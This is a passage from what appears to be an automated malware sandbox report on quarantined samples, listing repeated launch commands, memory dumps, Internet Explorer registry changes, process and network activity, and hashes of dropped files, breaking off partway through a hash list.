C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

Network

N/A

Files

memory/2308-0-0x000000007412E000-0x000000007412F000-memory.dmp

memory/2308-1-0x0000000000230000-0x00000000003A0000-memory.dmp

memory/2308-3-0x0000000074120000-0x000000007480E000-memory.dmp

memory/2308-4-0x000000007412E000-0x000000007412F000-memory.dmp

memory/2308-5-0x0000000074120000-0x000000007480E000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20240903-en

Max time kernel

121s

Max time network

127s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\I8L5Xon.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f025131ba688db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{46A1C821-F499-11EF-869D-46BBF83CD43C} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000004d1b1ca6f04c341a257f85594af0dda00000000020000000000106600000001000020000000cefa62c8335a558080a6fd0982a941d7f1c005aef8791418c792a682ff6c6884000000000e80000000020000200000002b1e7bbe3e5baa2b4b451cb0050c86788db912c44a06550e62db50e858ba0b0120000000b6ec7b8e9858665f6f12bf0714231abc61e5f477e1d31a90f72ad07f8948a7744000000037577dd0e9a419bedbe25811b70e59c9ce1278b1e1a011925f334fdf91c11874d7660f99fdedcb5514d6bcb2d1f0dc2fa86d74fd3b635bcdc35e699eba6777e4 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000004d1b1ca6f04c341a257f85594af0dda000000000200000000001066000000010000200000008362dff63c082eb17f07f6d7e1df8c91584938be5118afac7a53a0e4d2fccbce000000000e80000000020000200000008d326dfc9c4a76d5a623da573804795ab7bf658cc076937b264833433a3f23e990000000603cf3cd26ee1a9693952fac08a70514dece4aee0fa9a0e78337abededccf639dcd5db1435983b8a8a8c5b91a8a4ba449d4b696d98995b5616e85d58a0128fb7ba87b1fdb19856b97e105731bcc4bddd568cb562dccb2f9dc816a2b4bda981ffd9c5ac8662b64251f6c6a66c4ca6b7e298a0f3ced3a71296fc741c169217b4af23104de5422a9c36be9c9ff30b6ea60140000000ac3b5b6a3a806b8fa9c9eeb5b9a8281a799f7bea941808a45093a73219e514245a77b4170f05a358020d75bec4c47727ed0b0933a0fdd73dbf3ab61f95b99482 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774329" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\I8L5Xon.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2532 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabBD19.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\CabBD9A.tmp

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\TarBDAE.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f49b173a1405b941881ad205f53ed2d6
SHA1 0054b36b4b9730c02e81c4b9a270f2a7b5278f00
SHA256 bc38b1a04a98eefd0e0ead6291089f20ec9ffcd865111183e51073312e902c11
SHA512 33ac0459fca33478ad0ae5e867736b434fa91dedca583447e9a1dd5b2d6c08a463e006cfc32ae45372198ee7676f4134968bbe74bf82056c943a892dea72edd2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b46d165831e4811a621fadeda185cc4c
SHA1 a9f22469cc5ce8efa0eb81361e05187900e73152
SHA256 936299aab0f6bc06a8bcb3d8fbc979cd0b1713a471f980e68150994d35a3c8e7
SHA512 0d052a25817acb397ad01fb18df63cb434b4c2cf2441b3fe08d78cffcd3e711384c8bd0205d771f5a6bb62dea3d68a9eced9f64a34cad67aeaaea6738e03e785

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 212a1d4c90712c523dafd3d0a70a47de
SHA1 dd97ed5b63095e60aa97ac8dd12cd1d21f5e7352
SHA256 5634cab29a1a557ce51fe313d9e6791a0a62a01a5384ec14a18df5acbbfebc21
SHA512 5ae5fe0086dfd54efe75db0f7da6a7146d920f026df90d061e015fa21392547fa017c419101162b85dbf19be9f621f17506a97e3628a5ec0c4a7bc3c6de340b6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ea4fc6bd21fb32777a5937d795c8afec
SHA1 d974ce6b1111454161c83155f008d732d80d2e5d
SHA256 e270e512cae2d5aa6447d5feebe7e6535dfd9164028417d5cb7f2d83fc69cf22
SHA512 5832db80f36ee3fc52f7753dfbd677305252098f58746dfc06ab80c0c27e43755463c299887a8bf8e769ffac561ba23a5a9c81b83130e0dc4c763707cfc61120

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bb523a1b107bea7cb013b799f5c83189
SHA1 66d36d85f8423210370a21ab4aed83b0a8bcdf0f
SHA256 1af1fc622eca07fa2c55676fa78193d395557255a0891fc46cd041a9aeee4a57
SHA512 388b326b93538a4507aa524f7bcc10cd79dd48eb4a65e901df091b09ca5934f48ca5a229e567a711e863ddbad3d8cd06b5a766357e1c73f0ec68b82214f0b190

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 83452e00afc744da2acc9a60ae090588
SHA1 db2982f3de5a47ae6530b94196fa48e443965305
SHA256 4f528ff5b613c179c2faef963cd2da819d786600c256d90bc500eb88baf6d517
SHA512 f1177b154f331f0b5a7a5596e9f53abb962396a02096eaea6a04796305858fa2115e8705dfdb7e45dd7b091433aa48e0aad7c0b36d680ac76ffd26acca0c7714

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ab8719fba93379761f0b49bfab5802f3
